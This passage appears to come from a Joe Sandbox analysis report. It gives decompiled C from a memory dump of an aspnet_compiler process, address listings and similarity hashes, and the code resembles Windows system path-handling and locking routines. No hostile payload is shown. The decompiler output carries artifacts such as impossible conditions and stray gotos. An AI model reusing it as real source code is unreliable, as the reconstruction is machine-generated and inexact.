                          													_t177 =  *_v568 & 0x0000ffff;
                          													L25:
                          													_v580 = _t177;
                          													if(_t177 == 0) {
                          														L29:
                          														_t307 =  *_t321 & 0x0000ffff;
                          													} else {
                          														_t290 =  *_t321 & 0x0000ffff;
                          														_v576 = _t290;
                          														_t310 = _t177 & 0x0000ffff;
                          														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                          															_t307 =  *_t321 & 0xffff;
                          														} else {
                          															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                          															E0143F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                          															_t329 = _t329 + 0xc;
                          															_t311 = _v580;
                          															_t225 =  *_t321 + _t311 & 0x0000ffff;
                          															 *_t321 = _t225;
                          															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                          																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                          															}
                          															goto L29;
                          														}
                          													}
                          													_t271 = _v556 - _v588 + _v588;
                          													_v580 = _t307;
                          													_v576 = _t271;
                          													if(_t271 != 0) {
                          														_t308 = _t271 & 0x0000ffff;
                          														_v588 = _t308;
                          														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                          															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                          															E0143F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                          															_t329 = _t329 + 0xc;
                          															_t213 =  *_t321 + _v576 & 0x0000ffff;
                          															 *_t321 = _t213;
                          															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                          																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                          															}
                          														}
                          													}
                          													_t272 = _v560;
                          													if(_t272 != 0) {
                          														 *_t272 = _t321;
                          													}
                          													_t306 = 0;
                          													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                          													_t275 = _v572;
                          													if(_t275 != 0) {
                          														_t306 =  *_t275;
                          														if(_t306 != 0) {
                          															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                          														}
                          													}
                          													_t181 = _v544;
                          													if(_t181 != 0) {
                          														 *_t181 = 0;
                          														 *((intOrPtr*)(_t181 + 4)) = 0;
                          														 *((intOrPtr*)(_t181 + 8)) = 0;
                          														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                          														if(_v540 == 5) {
                          															_t182 = E013F52A5(1);
                          															_v588 = _t182;
                          															if(_t182 == 0) {
                          																E0140EB70(1, 0x14e79a0);
                          																goto L38;
                          															} else {
                          																_v560 = _t182 + 0xc;
                          																_t185 = E0140AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                          																if(_t185 == 0) {
                          																	_t324 = _v588;
                          																	goto L97;
                          																} else {
                          																	_t306 = _v544;
                          																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                          																	 *(_t306 + 4) = _t282;
                          																	_v576 = _t282;
                          																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                          																	 *_t306 = _t325;
                          																	if( *_t282 == 0x5c) {
                          																		_t149 = _t325 - 2; // -2
                          																		_t283 = _t149;
                          																		 *_t306 = _t283;
                          																		 *(_t306 + 4) = _v576 + 2;
                          																		_t185 = _t283 & 0x0000ffff;
                          																	}
                          																	_t324 = _v588;
                          																	 *(_t306 + 2) = _t185;
                          																	if((_v548 & 0x00000002) == 0) {
                          																		L97:
                          																		asm("lock xadd [esi], eax");
                          																		if((_t185 | 0xffffffff) == 0) {
                          																			_push( *((intOrPtr*)(_t324 + 4)));
                          																			E014395D0();
                          																			L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                          																		}
                          																	} else {
                          																		 *(_t306 + 0xc) = _t324;
                          																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                          																	}
                          																	goto L38;
                          																}
                          															}
                          															goto L41;
                          														}
                          													}
                          													L38:
                          													_t322 = 0;
                          												}
                          											}
                          										}
                          									}
                          									L39:
                          									if(_t254 !=  &_v532) {
                          										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                          									}
                          									_t169 = _t322;
                          								}
                          								goto L41;
                          							}
                          							goto L68;
                          						}
                          					}
                          					L41:
                          					_pop(_t317);
                          					_pop(_t323);
                          					_pop(_t255);
                          					return E0143B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                          				} else {
                          					_t299 = __edx[2];
                          					if( *_t299 == 0x5c) {
                          						_t256 =  *(_t299 + 2) & 0x0000ffff;
                          						if(_t256 != 0x5c) {
                          							if(_t256 != 0x3f) {
                          								goto L2;
                          							} else {
                          								goto L50;
                          							}
                          						} else {
                          							L50:
                          							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                          								goto L2;
                          							} else {
                          								_t251 = E01433D43(_t315, _t321, _t157, _v560, _v572, _t305);
                          								_pop(_t319);
                          								_pop(_t326);
                          								_pop(_t257);
                          								return E0143B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                          							}
                          						}
                          					} else {
                          						L2:
                          						_t260 = _v572;
                          						goto L3;
                          					}
                          				}
                          				L101:
                          			}















































































                          0x01414128
                          0x01414135
                          0x0141413c
                          0x01414141
                          0x01414145
                          0x01414147
                          0x0141414e
                          0x01414151
                          0x01414159
                          0x0141415c
                          0x01414160
                          0x01414164
                          0x01414168
                          0x0141416c
                          0x0141417f
                          0x01414181
                          0x0141446a
                          0x0141446a
                          0x0141418c
                          0x01414195
                          0x01414199
                          0x01414432
                          0x01414439
                          0x0141443d
                          0x01414442
                          0x01414447
                          0x00000000
                          0x0141419f
                          0x014141a3
                          0x014141b1
                          0x014141b9
                          0x014141bd
                          0x014145db
                          0x014145db
                          0x00000000
                          0x014141c3
                          0x014141c3
                          0x014141ce
                          0x014141d4
                          0x0145e138
                          0x0145e13e
                          0x0145e169
                          0x0145e16d
                          0x0145e19e
                          0x0145e16f
                          0x0145e16f
                          0x0145e175
                          0x0145e179
                          0x0145e18f
                          0x0145e193
                          0x00000000
                          0x0145e199
                          0x00000000
                          0x0145e199
                          0x0145e193
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014141da
                          0x014141da
                          0x014141df
                          0x014141e4
                          0x014141ec
                          0x01414203
                          0x01414207
                          0x0145e1fd
                          0x01414222
                          0x01414226
                          0x0145e1f3
                          0x0145e1f3
                          0x0141422c
                          0x0141422c
                          0x01414233
                          0x0145e1ed
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01414239
                          0x01414239
                          0x01414239
                          0x01414239
                          0x01414233
                          0x01414226
                          0x014141ee
                          0x014141ee
                          0x014141f4
                          0x01414575
                          0x0145e1b1
                          0x0145e1b1
                          0x00000000
                          0x0141457b
                          0x0141457b
                          0x01414582
                          0x0145e1ab
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01414588
                          0x01414588
                          0x0141458c
                          0x0145e1c4
                          0x0145e1c4
                          0x00000000
                          0x01414592
                          0x01414592
                          0x01414599
                          0x0145e1be
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0141459f
                          0x0141459f
                          0x014145a3
                          0x0145e1d7
                          0x0145e1e4
                          0x00000000
                          0x014145a9
                          0x014145a9
                          0x014145b0
                          0x0145e1d1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014145b6
                          0x014145b6
                          0x014145b6
                          0x00000000
                          0x014145b6
                          0x014145b0
                          0x014145a3
                          0x01414599
                          0x0141458c
                          0x01414582
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014141f4
                          0x0141423e
                          0x01414241
                          0x014145c0
                          0x014145c4
                          0x00000000
                          0x014145ca
                          0x014145ca
                          0x00000000
                          0x0145e207
                          0x0145e20f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014145d1
                          0x00000000
                          0x00000000
                          0x014145ca
                          0x00000000
                          0x01414247
                          0x01414247
                          0x01414247
                          0x01414249
                          0x01414249
                          0x01414249
                          0x01414251
                          0x01414251
                          0x01414257
                          0x0141425f
                          0x0141426e
                          0x01414270
                          0x0141427a
                          0x0145e219
                          0x0145e219
                          0x01414280
                          0x01414282
                          0x01414456
                          0x014145ea
                          0x00000000
                          0x014145f0
                          0x0145e223
                          0x00000000
                          0x0145e223
                          0x0141445c
                          0x0141445c
                          0x00000000
                          0x0141445c
                          0x00000000
                          0x01414288
                          0x0141428c
                          0x0145e298
                          0x01414292
                          0x01414292
                          0x0141429e
                          0x014142a3
                          0x014142a7
                          0x014142ac
                          0x0145e22d
                          0x014142b2
                          0x014142b2
                          0x014142b9
                          0x014142bc
                          0x014142c2
                          0x014142ca
                          0x014142cd
                          0x014142cd
                          0x014142d4
                          0x0141433f
                          0x0141433f
                          0x014142d6
                          0x014142d6
                          0x014142d9
                          0x014142dd
                          0x014142eb
                          0x0145e23a
                          0x014142f1
                          0x01414305
                          0x0141430d
                          0x01414315
                          0x01414318
                          0x0141431f
                          0x01414322
                          0x0141432e
                          0x0141433b
                          0x0141433b
                          0x00000000
                          0x0141432e
                          0x014142eb
                          0x0141434c
                          0x0141434e
                          0x01414352
                          0x01414359
                          0x0141435e
                          0x01414361
                          0x0141436e
                          0x0141438a
                          0x0141438e
                          0x01414396
                          0x0141439e
                          0x014143a1
                          0x014143ad
                          0x014143bb
                          0x014143bb
                          0x014143ad
                          0x0141436e
                          0x014143bf
                          0x014143c5
                          0x01414463
                          0x01414463
                          0x014143ce
                          0x014143d5
                          0x014143d9
                          0x014143df
                          0x01414475
                          0x01414479
                          0x01414491
                          0x01414491
                          0x01414479
                          0x014143e5
                          0x014143eb
                          0x014143f4
                          0x014143f6
                          0x014143f9
                          0x014143fc
                          0x014143ff
                          0x014144e8
                          0x014144ed
                          0x014144f3
                          0x0145e247
                          0x00000000
                          0x014144f9
                          0x01414504
                          0x01414508
                          0x0141450f
                          0x0145e269
                          0x00000000
                          0x01414515
                          0x01414519
                          0x01414531
                          0x01414534
                          0x01414537
                          0x0141453e
                          0x01414541
                          0x0141454a
                          0x0145e255
                          0x0145e255
                          0x0145e25b
                          0x0145e25e
                          0x0145e261
                          0x0145e261
                          0x01414555
                          0x01414559
                          0x0141455d
                          0x0145e26d
                          0x0145e270
                          0x0145e274
                          0x0145e27a
                          0x0145e27d
                          0x0145e28e
                          0x0145e28e
                          0x01414563
                          0x01414563
                          0x01414569
                          0x01414569
                          0x00000000
                          0x0141455d
                          0x0141450f
                          0x00000000
                          0x014144f3
                          0x014143ff
                          0x01414405
                          0x01414405
                          0x01414405
                          0x014142ac
                          0x0141428c
                          0x01414282
                          0x01414407
                          0x0141440d
                          0x0145e2af
                          0x0145e2af
                          0x01414413
                          0x01414413
                          0x00000000
                          0x014141d4
                          0x00000000
                          0x014141c3
                          0x014141bd
                          0x01414415
                          0x01414415
                          0x01414416
                          0x01414417
                          0x01414429
                          0x0141416e
                          0x0141416e
                          0x01414175
                          0x01414498
                          0x0141449f
                          0x0145e12d
                          0x00000000
                          0x0145e133
                          0x00000000
                          0x0145e133
                          0x014144a5
                          0x014144a5
                          0x014144aa
                          0x00000000
                          0x014144bb
                          0x014144ca
                          0x014144d6
                          0x014144d7
                          0x014144d8
                          0x014144e3
                          0x014144e3
                          0x014144aa
                          0x0141417b
                          0x0141417b
                          0x0141417b
                          0x00000000
                          0x0141417b
                          0x01414175
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f3198d323829d69ea0d2af0ca3e169d0752b8d57147e5ccac8ef9f8c2de6ca3b
                          • Instruction ID: 26496bfcbf3c3d1dc19182e97972b31d9ea6d3d3146586d54bf346c6b5cf4ccc
                          • Opcode Fuzzy Hash: f3198d323829d69ea0d2af0ca3e169d0752b8d57147e5ccac8ef9f8c2de6ca3b
                          • Instruction Fuzzy Hash: F0F16C706082118BD764CF59C480A7BB7E1EF98754F18492FF986CB3A5E734D982CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			E014220A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                          				signed int _v16;
                          				signed int _v20;
                          				signed char _v24;
                          				intOrPtr _v28;
                          				signed int _v32;
                          				void* _v36;
                          				char _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				unsigned int _v60;
                          				char _v64;
                          				unsigned int _v68;
                          				signed int _v72;
                          				char _v73;
                          				signed int _v74;
                          				char _v75;
                          				signed int _v76;
                          				void* _v81;
                          				void* _v82;
                          				void* _v89;
                          				void* _v92;
                          				void* _v97;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed char _t128;
                          				void* _t129;
                          				signed int _t130;
                          				void* _t132;
                          				signed char _t133;
                          				intOrPtr _t135;
                          				signed int _t137;
                          				signed int _t140;
                          				signed int* _t144;
                          				signed int* _t145;
                          				intOrPtr _t146;
                          				signed int _t147;
                          				signed char* _t148;
                          				signed int _t149;
                          				signed int _t153;
                          				signed int _t169;
                          				signed int _t174;
                          				signed int _t180;
                          				void* _t197;
                          				void* _t198;
                          				signed int _t201;
                          				intOrPtr* _t202;
                          				intOrPtr* _t205;
                          				signed int _t210;
                          				signed int _t215;
                          				signed int _t218;
                          				signed char _t221;
                          				signed int _t226;
                          				char _t227;
                          				signed int _t228;
                          				void* _t229;
                          				unsigned int _t231;
                          				void* _t235;
                          				signed int _t240;
                          				signed int _t241;
                          				void* _t242;
                          				signed int _t246;
                          				signed int _t248;
                          				signed int _t252;
                          				signed int _t253;
                          				void* _t254;
                          				intOrPtr* _t256;
                          				intOrPtr _t257;
                          				unsigned int _t262;
                          				signed int _t265;
                          				void* _t267;
                          				signed int _t275;
                          
                          				_t198 = __ebx;
                          				_t267 = (_t265 & 0xfffffff0) - 0x48;
                          				_v68 = __ecx;
                          				_v73 = 0;
                          				_t201 = __edx & 0x00002000;
                          				_t128 = __edx & 0xffffdfff;
                          				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                          				_v72 = _t128;
                          				if((_t128 & 0x00000008) != 0) {
                          					__eflags = _t128 - 8;
                          					if(_t128 != 8) {
                          						L69:
                          						_t129 = 0xc000000d;
                          						goto L23;
                          					} else {
                          						_t130 = 0;
                          						_v72 = 0;
                          						_v75 = 1;
                          						L2:
                          						_v74 = 1;
                          						_t226 =  *0x14e8714; // 0x0
                          						if(_t226 != 0) {
                          							__eflags = _t201;
                          							if(_t201 != 0) {
                          								L62:
                          								_v74 = 1;
                          								L63:
                          								_t130 = _t226 & 0xffffdfff;
                          								_v72 = _t130;
                          								goto L3;
                          							}
                          							_v74 = _t201;
                          							__eflags = _t226 & 0x00002000;
                          							if((_t226 & 0x00002000) == 0) {
                          								goto L63;
                          							}
                          							goto L62;
                          						}
                          						L3:
                          						_t227 = _v75;
                          						L4:
                          						_t240 = 0;
                          						_v56 = 0;
                          						_t252 = _t130 & 0x00000100;
                          						if(_t252 != 0 || _t227 != 0) {
                          							_t240 = _v68;
                          							_t132 = E01422EB0(_t240);
                          							__eflags = _t132 - 2;
                          							if(_t132 != 2) {
                          								__eflags = _t132 - 1;
                          								if(_t132 == 1) {
                          									goto L25;
                          								}
                          								__eflags = _t132 - 6;
                          								if(_t132 == 6) {
                          									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                          									if( *((short*)(_t240 + 4)) != 0x3f) {
                          										goto L40;
                          									}
                          									_t197 = E01422EB0(_t240 + 8);
                          									__eflags = _t197 - 2;
                          									if(_t197 == 2) {
                          										goto L25;
                          									}
                          								}
                          								L40:
                          								_t133 = 1;
                          								L26:
                          								_t228 = _v75;
                          								_v56 = _t240;
                          								__eflags = _t133;
                          								if(_t133 != 0) {
                          									__eflags = _t228;
                          									if(_t228 == 0) {
                          										L43:
                          										__eflags = _v72;
                          										if(_v72 == 0) {
                          											goto L8;
                          										}
                          										goto L69;
                          									}
                          									_t133 = E013F58EC(_t240);
                          									_t221 =  *0x14e5cac; // 0x16
                          									__eflags = _t221 & 0x00000040;
                          									if((_t221 & 0x00000040) != 0) {
                          										_t228 = 0;
                          										__eflags = _t252;
                          										if(_t252 != 0) {
                          											goto L43;
                          										}
                          										_t133 = _v72;
                          										goto L7;
                          									}
                          									goto L43;
                          								} else {
                          									_t133 = _v72;
                          									goto L6;
                          								}
                          							}
                          							L25:
                          							_t133 = _v73;
                          							goto L26;
                          						} else {
                          							L6:
                          							_t221 =  *0x14e5cac; // 0x16
                          							L7:
                          							if(_t133 != 0) {
                          								__eflags = _t133 & 0x00001000;
                          								if((_t133 & 0x00001000) != 0) {
                          									_t133 = _t133 | 0x00000a00;
                          									__eflags = _t221 & 0x00000004;
                          									if((_t221 & 0x00000004) != 0) {
                          										_t133 = _t133 | 0x00000400;
                          									}
                          								}
                          								__eflags = _t228;
                          								if(_t228 != 0) {
                          									_t133 = _t133 | 0x00000100;
                          								}
                          								_t229 = E01434A2C(0x14e6e40, 0x1434b30, _t133, _t240);
                          								__eflags = _t229;
                          								if(_t229 == 0) {
                          									_t202 = _a20;
                          									goto L100;
                          								} else {
                          									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                          									L15:
                          									_t202 = _a20;
                          									 *_t202 = _t135;
                          									if(_t229 == 0) {
                          										L100:
                          										 *_a4 = 0;
                          										_t137 = _a8;
                          										__eflags = _t137;
                          										if(_t137 != 0) {
                          											 *_t137 = 0;
                          										}
                          										 *_t202 = 0;
                          										_t129 = 0xc0000017;
                          										goto L23;
                          									} else {
                          										_t242 = _a16;
                          										if(_t242 != 0) {
                          											_t254 = _t229;
                          											memcpy(_t242, _t254, 0xd << 2);
                          											_t267 = _t267 + 0xc;
                          											_t242 = _t254 + 0x1a;
                          										}
                          										_t205 = _a4;
                          										_t25 = _t229 + 0x48; // 0x48
                          										 *_t205 = _t25;
                          										_t140 = _a8;
                          										if(_t140 != 0) {
                          											__eflags =  *((char*)(_t267 + 0xa));
                          											if( *((char*)(_t267 + 0xa)) != 0) {
                          												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                          											} else {
                          												 *_t140 = 0;
                          											}
                          										}
                          										_t256 = _a12;
                          										if(_t256 != 0) {
                          											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                          										}
                          										_t257 =  *_t205;
                          										_v48 = 0;
                          										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                          										_v56 = 0;
                          										_v52 = 0;
                          										_t144 =  *( *[fs:0x30] + 0x50);
                          										if(_t144 != 0) {
                          											__eflags =  *_t144;
                          											if( *_t144 == 0) {
                          												goto L20;
                          											}
                          											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                          											goto L21;
                          										} else {
                          											L20:
                          											_t145 = 0x7ffe0384;
                          											L21:
                          											if( *_t145 != 0) {
                          												_t146 =  *[fs:0x30];
                          												__eflags =  *(_t146 + 0x240) & 0x00000004;
                          												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                          													_t147 = E01417D50();
                          													__eflags = _t147;
                          													if(_t147 == 0) {
                          														_t148 = 0x7ffe0385;
                          													} else {
                          														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                          													}
                          													__eflags =  *_t148 & 0x00000020;
                          													if(( *_t148 & 0x00000020) != 0) {
                          														_t149 = _v72;
                          														__eflags = _t149;
                          														if(__eflags == 0) {
                          															_t149 = 0x13d5c80;
                          														}
                          														_push(_t149);
                          														_push( &_v48);
                          														 *((char*)(_t267 + 0xb)) = E0142F6E0(_t198, _t242, _t257, __eflags);
                          														_push(_t257);
                          														_push( &_v64);
                          														_t153 = E0142F6E0(_t198, _t242, _t257, __eflags);
                          														__eflags =  *((char*)(_t267 + 0xb));
                          														if( *((char*)(_t267 + 0xb)) != 0) {
                          															__eflags = _t153;
                          															if(_t153 != 0) {
                          																__eflags = 0;
                          																E01477016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                          																L01412400(_t267 + 0x20);
                          															}
                          															L01412400( &_v64);
                          														}
                          													}
                          												}
                          											}
                          											_t129 = 0;
                          											L23:
                          											return _t129;
                          										}
                          									}
                          								}
                          							}
                          							L8:
                          							_t275 = _t240;
                          							if(_t275 != 0) {
                          								_v73 = 0;
                          								_t253 = 0;
                          								__eflags = 0;
                          								L29:
                          								_push(0);
                          								_t241 = E01422397(_t240);
                          								__eflags = _t241;
                          								if(_t241 == 0) {
                          									_t229 = 0;
                          									L14:
                          									_t135 = 0;
                          									goto L15;
                          								}
                          								__eflags =  *((char*)(_t267 + 0xb));
                          								 *(_t241 + 0x34) = 1;
                          								if( *((char*)(_t267 + 0xb)) != 0) {
                          									E01412280(_t134, 0x14e8608);
                          									__eflags =  *0x14e6e48 - _t253; // 0x0
                          									if(__eflags != 0) {
                          										L48:
                          										_t253 = 0;
                          										__eflags = 0;
                          										L49:
                          										E0140FFB0(_t198, _t241, 0x14e8608);
                          										__eflags = _t253;
                          										if(_t253 != 0) {
                          											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                          										}
                          										goto L31;
                          									}
                          									 *0x14e6e48 = _t241;
                          									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                          									__eflags = _t253;
                          									if(_t253 != 0) {
                          										_t57 = _t253 + 0x34;
                          										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                          										__eflags =  *_t57;
                          										if( *_t57 == 0) {
                          											goto L49;
                          										}
                          									}
                          									goto L48;
                          								}
                          								L31:
                          								_t229 = _t241;
                          								goto L14;
                          							}
                          							_v73 = 1;
                          							_v64 = _t240;
                          							asm("lock bts dword [esi], 0x0");
                          							if(_t275 < 0) {
                          								_t231 =  *0x14e8608; // 0x0
                          								while(1) {
                          									_v60 = _t231;
                          									__eflags = _t231 & 0x00000001;
                          									if((_t231 & 0x00000001) != 0) {
                          										goto L76;
                          									}
                          									_t73 = _t231 + 1; // 0x1
                          									_t210 = _t73;
                          									asm("lock cmpxchg [edi], ecx");
                          									__eflags = _t231 - _t231;
                          									if(_t231 != _t231) {
                          										L92:
                          										_t133 = E01426B90(_t210,  &_v64);
                          										_t262 =  *0x14e8608; // 0x0
                          										L93:
                          										_t231 = _t262;
                          										continue;
                          									}
                          									_t240 = _v56;
                          									goto L10;
                          									L76:
                          									_t169 = E0142E180(_t133);
                          									__eflags = _t169;
                          									if(_t169 != 0) {
                          										_push(0xc000004b);
                          										_push(0xffffffff);
                          										E014397C0();
                          										_t231 = _v68;
                          									}
                          									_v72 = 0;
                          									_v24 =  *( *[fs:0x18] + 0x24);
                          									_v16 = 3;
                          									_v28 = 0;
                          									__eflags = _t231 & 0x00000002;
                          									if((_t231 & 0x00000002) == 0) {
                          										_v32 =  &_v36;
                          										_t174 = _t231 >> 4;
                          										__eflags = 1 - _t174;
                          										_v20 = _t174;
                          										asm("sbb ecx, ecx");
                          										_t210 = 3 |  &_v36;
                          										__eflags = _t174;
                          										if(_t174 == 0) {
                          											_v20 = 0xfffffffe;
                          										}
                          									} else {
                          										_v32 = 0;
                          										_v20 = 0xffffffff;
                          										_v36 = _t231 & 0xfffffff0;
                          										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                          										_v72 =  !(_t231 >> 2) & 0xffffff01;
                          									}
                          									asm("lock cmpxchg [edi], esi");
                          									_t262 = _t231;
                          									__eflags = _t262 - _t231;
                          									if(_t262 != _t231) {
                          										goto L92;
                          									} else {
                          										__eflags = _v72;
                          										if(_v72 != 0) {
                          											E0143006A(0x14e8608, _t210);
                          										}
                          										__eflags =  *0x7ffe036a - 1;
                          										if(__eflags <= 0) {
                          											L89:
                          											_t133 =  &_v16;
                          											asm("lock btr dword [eax], 0x1");
                          											if(__eflags >= 0) {
                          												goto L93;
                          											} else {
                          												goto L90;
                          											}
                          											do {
                          												L90:
                          												_push(0);
                          												_push(0x14e8608);
                          												E0143B180();
                          												_t133 = _v24;
                          												__eflags = _t133 & 0x00000004;
                          											} while ((_t133 & 0x00000004) == 0);
                          											goto L93;
                          										} else {
                          											_t218 =  *0x14e6904; // 0x400
                          											__eflags = _t218;
                          											if(__eflags == 0) {
                          												goto L89;
                          											} else {
                          												goto L87;
                          											}
                          											while(1) {
                          												L87:
                          												__eflags = _v16 & 0x00000002;
                          												if(__eflags == 0) {
                          													goto L89;
                          												}
                          												asm("pause");
                          												_t218 = _t218 - 1;
                          												__eflags = _t218;
                          												if(__eflags != 0) {
                          													continue;
                          												}
                          												goto L89;
                          											}
                          											goto L89;
                          										}
                          									}
                          								}
                          							}
                          							L10:
                          							_t229 =  *0x14e6e48; // 0x0
                          							_v72 = _t229;
                          							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                          								E0140FFB0(_t198, _t240, 0x14e8608);
                          								_t253 = _v76;
                          								goto L29;
                          							} else {
                          								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                          								asm("lock cmpxchg [esi], ecx");
                          								_t215 = 1;
                          								if(1 != 1) {
                          									while(1) {
                          										_t246 = _t215 & 0x00000006;
                          										_t180 = _t215;
                          										__eflags = _t246 - 2;
                          										_v56 = _t246;
                          										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                          										asm("lock cmpxchg [edi], esi");
                          										_t248 = _v56;
                          										__eflags = _t180 - _t215;
                          										if(_t180 == _t215) {
                          											break;
                          										}
                          										_t215 = _t180;
                          									}
                          									__eflags = _t248 - 2;
                          									if(_t248 == 2) {
                          										__eflags = 0;
                          										E014300C2(0x14e8608, 0, _t235);
                          									}
                          									_t229 = _v72;
                          								}
                          								goto L14;
                          							}
                          						}
                          					}
                          				}
                          				_t227 = 0;
                          				_v75 = 0;
                          				if(_t128 != 0) {
                          					goto L4;
                          				}
                          				goto L2;
                          			}











































































                          0x014220a0
                          0x014220a8
                          0x014220ad
                          0x014220b3
                          0x014220b8
                          0x014220c2
                          0x014220c7
                          0x014220cb
                          0x014220d2
                          0x01422263
                          0x01422266
                          0x01465836
                          0x01465836
                          0x00000000
                          0x0142226c
                          0x0142226c
                          0x01422270
                          0x01422274
                          0x014220e2
                          0x014220e2
                          0x014220e6
                          0x014220ee
                          0x014657dc
                          0x014657de
                          0x014657ec
                          0x014657ec
                          0x014657f1
                          0x014657f3
                          0x014657f8
                          0x00000000
                          0x014657f8
                          0x014657e0
                          0x014657e4
                          0x014657ea
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014657ea
                          0x014220f4
                          0x014220f4
                          0x014220f8
                          0x014220f8
                          0x014220fc
                          0x01422100
                          0x01422106
                          0x01422201
                          0x01422206
                          0x0142220b
                          0x0142220e
                          0x014222a9
                          0x014222ac
                          0x00000000
                          0x00000000
                          0x014222b2
                          0x014222b5
                          0x01465801
                          0x01465806
                          0x00000000
                          0x00000000
                          0x01465810
                          0x01465815
                          0x01465818
                          0x00000000
                          0x00000000
                          0x0146581e
                          0x014222bb
                          0x014222bb
                          0x01422218
                          0x01422218
                          0x0142221c
                          0x01422220
                          0x01422222
                          0x014222c2
                          0x014222c4
                          0x014222dc
                          0x014222dc
                          0x014222e1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x014222e7
                          0x014222c8
                          0x014222cd
                          0x014222d3
                          0x014222d6
                          0x01465823
                          0x01465825
                          0x01465827
                          0x00000000
                          0x00000000
                          0x0146582d
                          0x00000000
                          0x0146582d
                          0x00000000
                          0x01422228
                          0x01422228
                          0x00000000
                          0x01422228
                          0x01422222
                          0x01422214
                          0x01422214
                          0x00000000
                          0x01422114
                          0x01422114
                          0x01422114
                          0x0142211a
                          0x0142211c
                          0x01422348
                          0x0142234d
                          0x01465840
                          0x01465845
                          0x01465848
                          0x0146584e
                          0x0146584e
                          0x01465848
                          0x01422353
                          0x01422355
                          0x01422388
                          0x01422388
                          0x01422368
                          0x0142236a
                          0x0142236c
                          0x0142238f
                          0x00000000
                          0x0142236e
                          0x0142236e
                          0x0142218e
                          0x0142218e
                          0x01422191
                          0x01422195
                          0x01465a03
                          0x01465a06
                          0x01465a0c
                          0x01465a0f
                          0x01465a11
                          0x01465a13
                          0x01465a13
                          0x01465a19
                          0x01465a1f
                          0x00000000
                          0x0142219b
                          0x0142219b
                          0x014221a0
                          0x01422282
                          0x01422284
                          0x01422284
                          0x01422284
                          0x01422284
                          0x014221a6
                          0x014221a9
                          0x014221ac
                          0x014221ae
                          0x014221b3
                          0x0142228b
                          0x01422290
                          0x01422379
                          0x01422296
                          0x01422298
                          0x01422298
                          0x01422290
                          0x014221b9
                          0x014221be
                          0x014222a2
                          0x014222a2
                          0x014221c4
                          0x014221c8
                          0x014221cc
                          0x014221d0
                          0x014221d4
                          0x014221de
                          0x014221e3
                          0x01465a29
                          0x01465a2c
                          0x00000000
                          0x00000000
                          0x01465a3b
                          0x00000000
                          0x014221e9
                          0x014221e9
                          0x014221e9
                          0x014221ee
                          0x014221f1
                          0x01465a45
                          0x01465a4b
                          0x01465a52
                          0x01465a58
                          0x01465a5d
